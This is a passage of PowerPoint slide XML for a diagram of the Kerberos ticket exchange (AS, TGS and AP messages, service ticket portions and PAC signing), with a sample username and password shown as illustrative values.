                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0896B0F-C875-F240-D12E-9FD055DD0B44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8505500" y="1617587"/>
            <a:ext cx="1072730" cy="307778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>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1. AS-REQ</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connector: Curved 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC330935-CB31-ABD7-DEA6-8C0E07CF12E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="9227950" y="1896098"/>
            <a:ext cx="1025640" cy="843377"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3C78FA-7DBE-FD0B-A17D-44106288B11C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9050425" y="2157609"/>
            <a:ext cx="1053494" cy="307778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>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2. AS-REP</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connector: Curved 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCBE42B-8550-E982-8438-41C2F7357524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="9614873" y="2504709"/>
            <a:ext cx="221922" cy="995768"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99792"/>
              <a:gd name="adj2" fmla="val 70822"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3252B7A-FA12-818C-708C-1E2AF198A653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8690166" y="3250769"/>
            <a:ext cx="1200970" cy="307778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF">
                <a:lumMod val="75000"/>
              </a:sysClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>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white">
                    <a:lumMod val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3. TGS-REQ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white">
                  <a:lumMod val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Connector: Curved 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE83F867-4A91-9A7D-3ADB-6E82B567197A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="9520281" y="3120234"/>
            <a:ext cx="1079979" cy="882530"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{332FC70F-44E7-60A8-88CE-5412292B9755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10247144" y="3610356"/>
            <a:ext cx="1181734" cy="307778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1800"/>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4. TGS-REP</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Connector: Curved 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{338A700E-25B6-1607-1151-613F9473B365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="9253840" y="4315200"/>
            <a:ext cx="1215445" cy="1314470"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B21E92C-FF73-F7DE-CFB5-CF5C6B450680}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8955607" y="4931422"/>
            <a:ext cx="1072730" cy="307778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:sysClr val="window" lastClr="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1800"/>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cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5. AP-REQ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F675CC6-20D1-732A-9E1E-9CADFB315059}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1203954" y="1672130"/>
            <a:ext cx="1819540" cy="664377"/>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sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>allan.marshall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sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Awesomesauce123</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 2" descr="male user icon by acspike">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA74536-47EE-C7DC-C343-C5B02B27A2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4" y="1788255"/>
            <a:ext cx="876979" cy="87697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ACF6C6B-CF6E-0CD1-319F-7925AE6394A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850149" y="3271112"/>
            <a:ext cx="6952701" cy="2658201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solid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BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06C79987-0C4E-2EC6-51F8-9612CFB2564B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320260" y="4058059"/>
            <a:ext cx="3468054" cy="1846491"/>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1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Privilege Account Certificate (PAC)</a:t>
            </a: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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Username: allan.marshall</a:t>
            </a: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ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SID: S-1-5-21-409 … &lt;snip&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8901047-8761-136F-7AB2-04F0C0E5BC53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="837672" y="2915118"/>
            <a:ext cx="6965177" cy="419954"/>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b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service Ticket (TGS)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="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4E0066C-AC55-FE46-CCD9-2AF65262F6FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4318410" y="5561234"/>
            <a:ext cx="3469901" cy="338396"/>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nl-BE" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signed</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> w KDC LT </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="nl-BE" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DFF1FF4-A5EB-CA87-3E45-B11D30D8BB09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320471" y="5217247"/>
            <a:ext cx="3469901" cy="338396"/>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nl-BE" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signed w Target LT Key</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-BE" sz="1400" b="1" i="1" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Picture 4" descr="a seal by yves_guillou">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAC4CD1-C35D-4367-6C2E-4EB25E8E14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953" y="5247421"/>
            <a:ext cx="281900" cy="43283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7D2198D5-17A2-4612-5966-C9BEB4B87412}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320261" y="3335072"/>
            <a:ext cx="211" cy="2567256"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A2B863-110F-9E30-85D7-B3F17CD13FC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4332948" y="3402090"/>
            <a:ext cx="3454942" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server Portion</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-BE" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-BE" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(encrypted using Target LT key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92796A44-8CE7-7900-CCFA-25F915E680F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832884" y="3411203"/>
            <a:ext cx="3487587" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client Portion</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-BE" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-BE" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(encrypted using Client / TGS session key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="nl-BE" sz="1400" b="1" i="1" u="sng" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="nl-BE" sz="1400" b="1" i="1" u="sng" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
